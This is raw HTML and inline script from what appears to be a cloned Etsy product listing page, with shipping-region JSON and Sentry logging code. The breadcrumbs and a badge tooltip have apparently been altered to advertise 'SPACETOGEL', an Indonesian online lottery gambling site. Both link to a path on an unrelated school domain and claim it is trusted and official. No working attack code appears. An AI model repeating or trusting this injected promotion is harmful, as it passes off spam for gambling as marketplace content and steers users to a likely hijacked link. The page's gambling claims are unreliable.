\\-](\\d{4}))?","postal_code_placeholder":"","country_iso_code":"FM"},"148":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"MD"},"278":{"postal_code_type":"postal","postal_code_pattern":"980\\d{2}","postal_code_placeholder":"","country_iso_code":"MC"},"154":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"MN"},"155":{"postal_code_type":"postal","postal_code_pattern":"8\\d{4}","postal_code_placeholder":"","country_iso_code":"ME"},"147":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"MA"},"156":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"MZ"},"153":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"MM"},"160":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"NA"},"166":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"NP"},"233":{"postal_code_type":"postal","postal_code_pattern":"988\\d{2}","postal_code_placeholder":"","country_iso_code":"NC"},"167":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"3974","country_iso_code":"NZ"},"163":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"NI"},"161":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"NE"},"162":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"NG"},"282":{"postal_code_type":"postal","postal_code_pattern":"2899","postal_code_placeholder":"","country_iso_code":"NF"},"283":{"postal_code_type":"zip","postal_code_pattern":"(9695[012])(?:[ \\-](\\d{4}))?","postal_code_placeholder":"","country_iso_code":"MP"},"176":{"postal_code_type":"postal","postal_code_pattern":null,"postal_code_placeholder":"","country_iso_code":"KP"},"165":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"NO"},"168":{"postal_code_type":"postal","postal_code_pattern":"(?:PC )?\\d{3}","postal_code_placeholder":"","country_iso_code":"OM"},"169":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"PK"},"284":{"postal_code_type":"zip","postal_code_pattern":"(969(?:39|40))(?:[ \\-](\\d{4}))?","postal_code_placeholder":"","country_iso_code":"PW"},"173":{"postal_code_type":"postal","postal_code_pattern":"\\d{3}","postal_code_placeholder":"","country_iso_code":"PG"},"178":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"PY"},"171":{"postal_code_type":"Postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"PE"},"172":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"PH"},"174":{"postal_code_type":"postal","postal_code_pattern":"\\d{2}-\\d{3}","postal_code_placeholder":"10-345","country_iso_code":"PL"},"177":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}-\\d{3}","postal_code_placeholder":"1000-205","country_iso_code":"PT"},"175":{"postal_code_type":"zip","postal_code_pattern":"(00[679]\\d{2})(?:[ \\-](\\d{4}))?","postal_code_placeholder":"","country_iso_code":"PR"},"304":{"postal_code_type":"postal","postal_code_pattern":"9[78]4\\d{2}","postal_code_placeholder":"","country_iso_code":"RE"},"180":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"RO"},"181":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"101000","country_iso_code":"RU"},"308":{"postal_code_type":"postal","postal_code_pattern":"9[78][01]\\d{2}","postal_code_placeholder":"","country_iso_code":"BL"},"286":{"postal_code_type":"postal","postal_code_pattern":"(?:ASCN|STHL) 1ZZ","postal_code_placeholder":"","country_iso_code":"SH"},"288":{"postal_code_type":"postal","postal_code_pattern":"9[78][01]\\d{2}","postal_code_placeholder":"","country_iso_code":"MF"},"289":{"postal_code_type":"postal","postal_code_pattern":"9[78]5\\d{2}","postal_code_placeholder":"","country_iso_code":"PM"},"249":{"postal_code_type":"Postal","postal_code_pattern":"VC\\d{4}","postal_code_placeholder":"","country_iso_code":"VC"},"291":{"postal_code_type":"postal","postal_code_pattern":"4789\\d","postal_code_placeholder":"","country_iso_code":"SM"},"183":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"SA"},"185":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"SN"},"189":{"postal_code_type":"postal","postal_code_pattern":"\\d{5,6}","postal_code_placeholder":"","country_iso_code":"RS"},"220":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"SG"},"191":{"postal_code_type":"postal","postal_code_pattern":"\\d{3} ?\\d{2}","postal_code_placeholder":"","country_iso_code":"SK"},"192":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"SI"},"188":{"postal_code_type":"postal","postal_code_pattern":"[A-Z]{2} ?\\d{5}","postal_code_placeholder":"","country_iso_code":"SO"},"215":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"ZA"},"294":{"postal_code_type":"postal","postal_code_pattern":"SIQQ 1ZZ","postal_code_placeholder":"","country_iso_code":"GS"},"136":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"KR"},"99":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"28013","country_iso_code":"ES"},"142":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"LK"},"184":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"SD"},"295":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"SJ"},"194":{"postal_code_type":"postal","postal_code_pattern":"[HLMS]\\d{3}","postal_code_placeholder":"","country_iso_code":"SZ"},"193":{"postal_code_type":"postal","postal_code_pattern":"^\\d{5}$","postal_code_placeholder":"111 22","country_iso_code":"SE"},"80":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"CH"},"204":{"postal_code_type":"postal","postal_code_pattern":"\\d{3}(?:\\d{2,3})?","postal_code_placeholder":"","country_iso_code":"TW"},"199":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"TJ"},"205":{"postal_code_type":"postal","postal_code_pattern":"\\d{4,5}","postal_code_placeholder":"","country_iso_code":"TZ"},"198":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"TH"},"164":{"postal_code_type":"postal","postal_code_pattern":"[1-9]\\d{3} ?(?:[A-RT-Z][A-Z]|S[BCE-RT-Z])","postal_code_placeholder":"1105 AW","country_iso_code":"NL"},"202":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"TN"},"203":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"TR"},"200":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"TM"},"299":{"postal_code_type":"postal","postal_code_pattern":"TKCA 1ZZ","postal_code_placeholder":"","country_iso_code":"TC"},"207":{"postal_code_type":"postal","postal_code_pattern":"^([0-8][0-9]{4}|9[0-3][0-9]{3}|94[0-8][0-9]{2}|949[0-8][0-9]|9499[0-9])$","postal_code_placeholder":"","country_iso_code":"UA"},"105":{"postal_code_type":"postal","postal_code_pattern":"^(GIR ?0AA|((AB|AL|B|BA|BB|BD|BF|BH|BL|BN|BR|BS|BT|BX|CA|CB|CF|CH|CM|CO|CR|CT|CV|CW|DA|DD|DE|DG|DH|DL|DN|DT|DY|E|EC|EH|EN|EX|FK|FY|G|GL|GY|GU|HA|HD|HG|HP|HR|HS|HU|HX|IG|IM|IP|IV|JE|KA|KT|KW|KY|L|LA|LD|LE|LL|LN|LS|LU|M|ME|MK|ML|N|NE|NG|NN|NP|NR|NW|OL|OX|PA|PE|PH|PL|PO|PR|RG|RH|RM|S|SA|SE|SG|SK|SL|SM|SN|SO|SP|SR|SS|ST|SW|SY|TA|TD|TF|TN|TQ|TR|TS|TW|UB|W|WA|WC|WD|WF|WN|WR|WS|WV|YO|ZE)(\\d[\\dA-Z]? ?\\d[ABD-HJLN-UW-Z]{2}))|BFPO ?\\d{1,4})$","postal_code_placeholder":"NW1 6XE","country_iso_code":"GB"},"209":{"postal_code_type":"zip","postal_code_pattern":"^\\d{5}(?:-\\d{4})?$","postal_code_placeholder":"12345","country_iso_code":"US"},"302":{"postal_code_type":"zip","postal_code_pattern":"96898","postal_code_placeholder":"","country_iso_code":"UM"},"208":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"UY"},"248":{"postal_code_type":"zip","postal_code_pattern":"(008(?:(?:[0-4]\\d)|(?:5[01])))(?:[ \\-](\\d{4}))?","postal_code_placeholder":"","country_iso_code":"VI"},"210":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"UZ"},"211":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"VE"},"212":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}\\d?","postal_code_placeholder":"","country_iso_code":"VN"},"224":{"postal_code_type":"postal","postal_code_pattern":"986\\d{2}","postal_code_placeholder":"","country_iso_code":"WF"},"213":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"EH"},"217":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"ZM"}},"ship_to_preference_capabilities":{"209":{"postal_code":{"is_assignable":true,"is_required":true}},"79":{"postal_code":{"is_assignable":true,"is_required":true}},"122":{"postal_code":{"is_assignable":true,"is_required":true}},"61":{"postal_code":{"is_assignable":true,"is_required":true}},"105":{"postal_code":{"is_assignable":true,"is_required":true}}},"category_id":68887416,"admin_tools_page_data":[],"currency_data":{"currency_id":826,"code":"GBP","name":"British Pound","number_precision":2,"symbol":"\u00a3","listing_enabled":true,"browsing_enabled":true,"buyer_location_restricted":false,"rate_updates_enabled":true},"machine_translation\/listings_click_to_translate":true,"ads.prolist\/log_clicks_and_impressions":false,"mfg\/dovetail":true,"mfg\/buyer_facing_dovetail":true,"searchx\/4q18\/dwell_time_as_backend_event":false,"is_regulatory_buyer_disclosure_enabled":true,"is_convos_condensed_disclosure_enabled":false,"machine_translation":{"mode":"disabled","listing_id":4302118744,"to_lang_code":"en-US","from_lang_code":"en-US","translated":null,"untranslated":null,"category_tags":null},"listing_fee":20,"presented_listing_fee":"$0.20 USD","listing_period_months":4,"apple_pay_api_version_number":12,"render_is_gift_section":true,"coupons_in_buy_box_is_enabled":false,"is_eligible_web_components":false,"should_show_atc_from_listing_cards":true,"should_show_atc_from_listing_cards_mweb":false,"added_to_cart_text":"Added to cart!","speculation_rules_prefetch":false,"speculation_rules_prefetch_from_search":false,"prefetch_event_cache_key":"","should_show_sidebar_cart_post_atc_recs":false,"is_eligible_for_trust_suite_section":false,"is_gift_guide_flyout_enabled":false,"should_hide_sub_nav":true,"should_show_breadcrumbs":true,"listing_image_url":"","eligible_for_mini_collections_and_ignore_menu":false,"image_ids_by_listing_variation_ids":[],"should_show_scrollable_thumbnails":true,"should_show_video":true,"shouldShowThumbnails":true,"carousel_height_percentage_relative_to_width":[80,80,80,80,80,80,80,80,80,80],"is_mobile_experience":false,"is_users_own_listing":false,"listing_sale_price_is_gamed":false,"lp_toffers_v2_true_sale_enabled":false,"sale_ending_soon_countdown":true,"should_show_histogram_panel":false,"anchor_shop_name_to_seller_cred":false,"shop_reviews_count":62595,"neu_buy_box_type":"offerings","listing_id":4302118744,"klarna_osm_js":"https:\/\/js.klarna.com\/web-sdk\/v1\/klarna.js","is_eligible_for_klarna_osm":false,"is_eligible_for_variations_update":true,"can_listing_have_coupon_applied":false,"quantity_submodule_enabled":true,"is_multiple_questions_enabled_buyer":true,"personalization_is_required":true,"personalization_field_count":1,"how_its_made_label_type":"seller_designed","product_details_content_toggle_selector":"[data-wt-content-toggle][aria-controls='content-toggle-product-details-read-more']","should_show_description_content_toggle":true,"use_shipping_variant_view":true,"shipping_section_default_open":true,"shipping_and_returns_is_eligible_for_sticky_buy_box":true,"estimated_shipping_is_eligible_for_sticky_buy_box":true,"is_eligible_for_shipping_and_returns_cleanup":true,"is_postal_code_empty_on_initial_load":true,"invalid_postal_codes":{"209":["000","001","002","003","004","213","269","343","345","348","353","419","428","429","517","518","519","529","533","536","552","568","569","578","579","589","621","632","642","643","659","663","682","694","695","696","697","698","699","702","709","715","732","742","771","817","818","819","839","848","849","854","858","861","862","866","867","868","869","872","886","887","888","892","896","899","909","929","987"]},"is_eligible_for_policies_in_overlay":true,"active_tab":"same_listing_reviews","allow_reviews_debug":false,"using_mweb_tabs":false,"load_tabbed_layout_js":true,"should_show_helpful_count":true,"should_default_chronological_sort":false,"should_include_subratings":true,"current_page":1,"is_deep_dive":false,"has_appreciation_photos":true,"eligible_for_review_photo_filter_and_sort":true,"is_new_deep_dive":false,"photos_per_page":4,"review_categorical_tags_enabled":true,"review_hide_sort_by_prefix":true,"mweb_can_scroll_to_seller_cred_module":false,"is_eligible_for_showing_more_items_on_explore_more":false,"structured_policies_messages":{"module_name":"Shop policies","last_updated_on":"Last updated on","publish":"Publish Shop Policies","policies_save":"Save policies","policies_edit":"Edit policies","cancel":"Cancel","revert":"Use previous policies","edit":"Edit","loading":"Loading","preview_banner_kicker":"Policies preview","not_existing_policies_preview_banner_header":"Review and customize these policies so they work for you","preview_banner_body":"You can publish these to your shop or edit them if you need to make changes","preview_publish_confirm":"By clicking Publish, you'll post your Shop Policies and agree to comply with them.","revert_confirm":"Are you sure you want to revert?","leave_page_warning":"You are currently editing shop policies","private_receipt_info_title":"Private receipt info","private_receipt_info_body":"We have removed the 'Private Receipt Info' section of your policies page. You don't need to populate this section for the purposes of complying with international consumer protection laws anymore because this new Policies feature will automatically display the relevant content of your shop policies within the buyer receipt email instead.","private_receipt_info_link":"See this FAQ for more information","structured_banner_title":"Switch to simple shop policies","structured_banner_title_v2":"Set up simple shop policies","structured_banner_body":"We'll give you a quick template to create your shop policies in seconds.","structured_banner_button":"Try it now","new_simplified_policies":"Your new, simplified policies","new_policies_banner_description_1":"Buyers prefer policies that are short, clear and address their key concerns, so we've designed them that way.","new_policies_banner_description_2":"Review and customize these policies so they work for you. We've saved your previous policies, so you can always switch back.","new_policies_banner_description_3":"We've saved your previous policies, so you can always switch back.","new_policies_banner_learn_more":"Learn more","publish_policies_success":"Your new policies have been published!","publish_policies_error":"There was an error publishing your policies. Please try again.","policies_failed_to_load":"Shop policies failed to load","policies_try_again":"Try again","policies_saving":"Saving...","policies_publishing":"Publishing...","listing_preview_shipping":"This section will show shipping or download information once you publish your listing.","craft_shipping_section_title":"Shipping & policies","craft_payments_section_title":"Payments","craft_refunds_section_title":"Returns & exchanges","craft_terms_section_title":"Terms & conditions","craft_more_details_accordion_label":"+ See more...","listing_returns_and_exchanges":"See item details for return and exchange eligibility.","no_policies":"Looks like this shop doesn't have any custom policies. Have questions?","message_the_seller":"Message the seller","shipping_section_title":"Shipping","payments_section_title":"Payments","refunds_section_title":"Returns & exchanges","digital_section_title":"Downloads","terms_section_title":"Terms & conditions","more_details_accordion_label":"See more...","seller_details_section_title":"More information"},"shop_policy_selector":"[data-content-toggle-uid=shop_policies]","load_user_faves_option":true,"update_many_faves_option":true,"is_async_only_faves_option":false,"guest_favorites_enabled":true,"collection_count":0,"favorites_key":"","use_clearer_privacy_description":true,"conditional_sale_interstitial":true,"google_client_id":"296956783393-2d8r0gljo87gjmdpmvkgbeasdmelq33e.apps.googleusercontent.com","show_one_tap_modal":false,"is_google_one_tap_cart_page":false});
        })();
    </script>

        <script nonce="+gWSoSeB7oJ/5IB7H6o53UJw">__webpack_public_path__ = "https://www.etsy.com/ac/evergreenVendor/js/en-US/";</script>

    <script src="https://js.sentry-cdn.com/ba12d66291e647788d8a9f0878043603.min.js" crossorigin="anonymous" nonce="+gWSoSeB7oJ/5IB7H6o53UJw"></script>
<script nonce="+gWSoSeB7oJ/5IB7H6o53UJw">(function() {
var asyncAvailable = true;
try {
    eval("async () => {}");
} catch(e) {
    asyncAvailable = false;
}

var falseUA = true && !asyncAvailable;
var primarySupportsAsync = !true && asyncAvailable;

var clientloggerIsEnabled = true;
if (clientloggerIsEnabled) {
    if (falseUA) {
        new Image().src = '/clientlog?falseua=1';
    }
    if (primarySupportsAsync) {
        new Image().src = '/clientlog?primarysupportsasync=1';
    }
    if (window.__etsy_logging && window.__etsy_logging.bots && (window.__etsy_logging.bots.isBot || window.__etsy_logging.bots.botCheck.length > 0)) {
        new Image().src = '/clientlog?feisbot=1&bot_check=' + encodeURIComponent(JSON.stringify(window.__etsy_logging.bots.botCheck));
    }
}

    if (typeof Sentry !== 'object') { return; }

    function breadcrumbFilter (arr_xhr, arr_console) {
        return function (crumb) {
            if (typeof crumb === 'object') {
                if (crumb.category === 'xhr'
                    && typeof crumb.data === 'object'
                    && typeof crumb.data.url === 'string') {
                    return !arr_xhr.some(function (re) {
                        return crumb.data.url.match(re);
                    }) && crumb;
                } else if (crumb.category === 'console'
                           && typeof crumb.message === 'string') {
                    return !arr_console.some(function (re) {
                        return crumb.message.match(re);
                    }) && crumb;
                }
            }
            return crumb;
        };
    }

    function beforeSend(event, hint) {
        try {
            if (hint.originalException.detail.reason.message === 'Extension context invalidated.') {
                return null;
            }
        } catch(_ignore) {
        }

        var serverUA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36".trim();
        var browserUA = navigator.userAgent.trim();
        var mismatch = serverUA !== browserUA;

        if (mismatch) {
            return null;
        }

        if (falseUA) {
            return null;
        }

        event.request = event.request || {};
        event.request.headers = event.request.headers || {};
        event.extra = event.extra || {};

        event.request.headers["User-Agent"] = serverUA;
        event.extra["browser_side_user_agent"] = browserUA;

        if (window.__etsy_logging && window.__etsy_logging.bots && window.__etsy_logging.bots.isBot) {

            return null;
        }

        return event;
    }
    Sentry.onLoad(function() {
        var options = {
            release: 'ed238592a490b126-prod',
            environment: 'Production',
            autoSessionTracking: false,
            beforeSend: beforeSend,
            beforeBreadcrumb: breadcrumbFilter([/lalocandadinonnaflo.com\/es\/\/bcn\/beacon$/i, /\/icht.etsysecure.com\//i], [/https\:\/\/www\.salvatorespizzeriarestaurant\.com\/careers/]),
            ignoreErrors: ["top.GLOBALS", /https\:\/\/www\.youtube\.com/, /undefined is not an object.*dataLayerTransactions.length/, /https\:\/\/tpc\.googlesyndication\.com/, /http\:\/\/fairytrade\.co\.uk/, /http\:\/\/100actsofsewing\.com/, /https\:\/\/www\.nobiggie\.net/, /staticxx\.facebook\.com/, /__firefox__/, /JSON syntax error/, /https\:\/\/bid\.g\.doubleclick\.net/, /https\:\/\/5094987\.fls\.doubleclick\.net/, /https\:\/\/www\.google\.com/, /https\:\/\/www\.zenaps\.com/, /Cannot read property.*DOMNodeInsertedByJs/, /e.tagName.toLowerCase/, /twttr/, /PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX/, /Error calling method on NPObject/, /Access is denied./, /document\.getElementsByClassName\.ToString/, /https\:\/\/accounts\.google\.com/, /_isMatchingDomain/, /NS_ERROR_NOT_INITIALIZED/, /loginFormData\.userNameValue/, /find variable: \$pr/, /\$pr is not defined/, /find variable: _AutofillCallbackHandler/],
            allowUrls: [/etsystatic\.com/, /etsy\.com\/paula/, /etsy\.com\/d?ac/, /etsy\.com\/daj/, /etsycorp\.com/, /etsycloud\.com/],
            denyUrls: [],
            sampleRate: 1.0,
        };


        Sentry.init(options);

        var hasViteAsset = Array.from(document.scripts).find(function (script) {
            return /\/[a-z]+[vV]ite\//.test(script.src);
        });

        Sentry.configureScope(function(scope) {
            scope.setUser({"id":"uj0nemGYfZm0u5UhoRQWjT5qMRzf","ip_address":"202.126.110.18"});
            scope.setTags({"user_id":null,"is_signed_in":false,"is_web_view":false,"is_atlas_request":false,"request_uuid":"EunhLnzL4sAYJypZdeOPahA2o_53","locale":"en-US","build_variant":"evergreenVendor","polyfill":"paula","neu_runtime_tracing":"off","fullstory":"off","speedcurve_lux":"off","primary_event_name":"view_listing"});
            scope.setExtras({"server_side_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"});
            scope.setTag('has_vite_asset', hasViteAsset ? 'true' : 'false');
        });

        window.__etsy_logging.errorQueue.forEach(function(errorData) {
            if (errorData[4]) {
                Sentry.captureException(errorData[4]);
            }
        });
    });
})();</script>

   <script src="https://www.etsy.com/ac/evergreenVendor/js/en-US/vendor_bundle.4b28aa70c9cca35746a4.js" type="text/javascript" nonce="+gWSoSeB7oJ/5IB7H6o53UJw" crossorigin defer></script>
   <script src="https://www.etsy.com/ac/evergreenVendor/js/en-US/etsy_libs.80be4aa737e18e6d1fe5.js" type="text/javascript" nonce="+gWSoSeB7oJ/5IB7H6o53UJw" crossorigin defer></script>
   <script src="https://www.etsy.com/paula/v3/polyfill.min.js?etsy-v=v5&flags=gated&features=AbortController%2CDOMTokenList.prototype.@@iterator%2CDOMTokenList.prototype.forEach%2CIntersectionObserver%2CIntersectionObserverEntry%2CNodeList.prototype.@@iterator%2CNodeList.prototype.forEach%2CObject.preventExtensions%2CString.prototype.anchor%2CString.raw%2Cdefault%2Ces2015%2Ces2016%2Ces2017%2Ces2018%2Ces2019%2Ces2020%2Ces2021%2Ces2022%2Cfetch%2CgetComputedStyle%2CmatchMedia%2Cperformance.now" type="text/javascript" nonce="+gWSoSeB7oJ/5IB7H6o53UJw" crossorigin defer>
   <script src="https://www.etsy.com/ac/evergreenVendor/js/en-US/app-shell/globals/index.a102ed4d03005c7067f5.js" type="text/javascript" nonce="+gWSoSeB7oJ/5IB7H6o53UJw" crossorigin defer></script>
   <script src="https://www.etsy.com/ac/evergreenVendor/js/en-US/@etsy-modules/ConsentManagement/Transcend-Integration.5952c095cb0676fe13c9.js" type="text/javascript" nonce="+gWSoSeB7oJ/5IB7H6o53UJw" crossorigin defer></script>
   <script src="https://www.etsy.com/ac/evergreenVendor/js/en-US/bootstrap/listings3/main.125161e9593a75b27a7b.js" type="text/javascript" nonce="+gWSoSeB7oJ/5IB7H6o53UJw" crossorigin defer></script>

        <main id="content">
            <div data-ui="listing-breadcrumbs" class="wt-hide-xs wt-show-lg breadcrumb_nav">
    <div data-ui="cat-nav" id="desktop-category-nav" class="cat-nav  v2-toolkit-cat-nav wt-ml-xs-0 wt-mr-xs-0">
        <div class="wt-text-caption wt-position-relative wt-z-index-5 wt-pt-xs-2">
                <div class="wt-grid wt-body-max-width wt-pl-xs-2 wt-pr-xs-2 wt-pl-md-4 wt-pr-md-4 wt-pl-lg-6 wt-pr-lg-6">
                <ul class="wt-list-unstyled wt-grid__item-xs-12 wt-body-max-width wt-display-flex-xs wt-justify-content-center" data-menu-ui="menubar" data-ui="top-nav-category-list">
                        <li data-ui="list-item-breadcrumbs" class="top-nav-item wt-sem-text-primary wt-text-body-small--tight wt-pb-xs-2">
                            <a data-breadcrumb-link data-menu-ui="menuitem" tabindex="0" href="https://ppschool.org.in/stella/">SPACETOGEL</a>
                                <span class="etsy-icon arrow-separator wt-sem-text-primary wt-icon--smallest-xs"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M8 21a1 1 0 0 1-.664-1.747l8.164-7.254-8.164-7.252a1 1 0 0 1 1.328-1.494L18.5 12l-9.836 8.747A1 1 0 0 1 8 21"/></svg></span>
                        </li>
                        <li data-ui="list-item-breadcrumbs" class="top-nav-item wt-sem-text-primary wt-text-body-small--tight wt-pb-xs-2">
                            <a data-breadcrumb-link data-menu-ui="menuitem" tabindex="0" href="https://ppschool.org.in/stella/">SPACETOGEL AKSES</a>
                        </li>
                           <pre> | </pre> 
                         </li>   
                            <li data-ui="list-item-breadcrumbs" class="top-nav-item wt-sem-text-primary wt-text-body-small--tight wt-pb-xs-2">
                            SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia
                        </li>
                </ul>
                <span class="active-nav-item-indicator wt-position-absolute wt-display-inline-block" data-ui="active-nav-item-indicator"></span>
        </div>
        </div>
    </div>
</div>



<div data-selector="listing-page-content" class="content-wrap listing-page-content">

    

    

    <div class="wt-pt-xs-5 listing-page-content-container-wider wt-horizontal-center">

        <div id="listing-right-column" class="listing-buy-box-experiment">

            <div>
                <div class="body-wrap wt-body-max-width wt-display-flex-md wt-flex-direction-column-xs">
                    <div class="image-col wt-order-xs-1 wt-mb-xs-2 wt-mb-lg-6 wt-pl-md-4 wt-pl-lg-5 wt-pl-xs-2 wt-pr-xs-2 wt-pr-xl-2 wt-pr-md-4 wt-pr-lg-0">
                        <div class="wt-flex-lg-6 wt-mr-lg-3 wt-pr-xl-3">
                            <div class="image-wrapper wt-position-relative carousel-container-responsive" id="photos">
    

        <div data-listing-page-badge
            style="margin-left: 78px; "
            class="wt-position-absolute wt-z-index-2 wt-position-top wt-position-left wt-mt-xs-1"
        >
            <div class="wt-popover" data-wt-popover>
    <button data-wt-popover-trigger
            class="wt-popover__trigger wt-popover__trigger--underline wt-display-inline-flex-xs wt-align-items-center wt-text-caption"
            aria-disabled="true"
            aria-describedby="etsys_pick"
    >
<span data-clg-id="WtBadge" class="wt-badge wt-badge--statusRecommendation wt-pl-xs-2">
                <span class="wt-icon wt-icon--smaller-xs wt-nudge-r-3"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="m15.4 14.1-3.7-1.9-1.8-3.6c-.3-.7-1.4-.7-1.8 0l-1.9 3.7-3.7 1.9c-.3.1-.5.4-.5.8q0 .6.6.9l3.7 1.9 1.9 3.7c.1.3.4.5.8.5q.6 0 .9-.6l1.9-3.7 3.7-1.9c.3-.2.6-.5.6-.9s-.3-.6-.7-.8m6-8L19 4.9l-1.2-2.4c-.3-.7-1.4-.7-1.8 0l-1.2 2.4-2.4 1.2c-.2.2-.4.5-.4.9q0 .6.6.9L15 9.1l1.2 2.4c.2.3.5.6.9.6q.6 0 .9-.6l1.2-2.4 2.4-1.2c.2-.2.4-.5.4-.9q0-.6-.6-.9"/></svg></span>SPACETOGEL

</span>
    </button>
    <div id="etsys_pick" role="tooltip">
        Di tengah semakin berkembangnya dunia hiburan online, SPACETOGEL hadir sebagai salah satu link toto togel resmi yang banyak dicari oleh para pecinta togel online. Dengan reputasi yang terus meningkat, SPACETOGEL dikenal sebagai portal yang menghubungkan pemain ke 10 situs togel terpercaya tahun 2026 dengan sistem aman, transparan, dan pelayanan profesional. <p class="wt-mt-xs-3"><a href="https://ppschool.org.in/stella/" target="_blank"> SPACETOGEL </a></p>
    </div>
</div>
        </div>

    
        <button
            class="btn--focus  wt-position-absolute wt-btn wt-btn--light wt-btn--small wt-z-index-2 wt-btn--filled wt-btn--icon wt-btn--fixed-floating wt-position-right wt-mr-xs-2 wt-mt-xs-2"
            data-ui="favorite-listing-button"
            data-listing-id="4302118744"
            data-accessible-btn-fave
            data-favorite-label="Add to Favorites"
            data-favorited-label="Remove from Favorites"
            
            
            data-always-show="true"
            
            
            
        >
            <div class="favorite-listing-button-icon-container should-animate "
                 data-source="lp_image_carousel" 
                data-btn-fave
                data-neu-fave
                data-favorite-icon-container
            >
                <span class="etsy-icon wt-nudge-t-1&#10;                    &#10;                    &#10;                        &#10;                        &#10;                            wt-display-block&#10;                        &#10;                    " data-not-favorited-icon=""><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path fill-rule="evenodd" clip-rule="evenodd" d="M20.877 12.52q.081-.115.147-.239A6 6 0 0 0 12 4.528a6 6 0 0 0-9.024 7.753q.066.123.147.24l.673.961a6 6 0 0 0 .789.915L12 21.422l7.415-7.025q.44-.418.789-.915zm-14.916.425L12 18.667l6.04-5.722q.293-.279.525-.61l.673-.961a.3.3 0 0 0 .044-.087 4 4 0 1 0-7.268-2.619v.003L12 8.667l-.013.004v-.002l-.006-.064a3.98 3.98 0 0 0-1.232-2.51 4 4 0 0 0-6.031 5.193q.014.045.044.086l.673.961a4 4 0 0 0 .526.61"/></svg></span>
                <span class="etsy-icon wt-nudge-t-1 wt-text-favorite-heart&#10;                    &#10;                    &#10;                        &#10;                        &#10;                            wt-display-none&#10;                        &#10;                    " data-favorited-icon=""><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M21.024 12.281a2 2 0 0 1-.147.24l-.673.961q-.349.497-.789.915L12 21.422l-7.415-7.025a6 6 0 0 1-.789-.915l-.673-.961a2 2 0 0 1-.147-.24A6 6 0 0 1 12 4.528a6 6 0 0 1 9.024 7.753"/></svg></span>
            </div>
            <span aria-hidden="true" class="icon"></span>
            <span class="wt-screen-reader-only" data-a11y-label>
                
                Add to Favorites
            </span>
            </button>
        
    

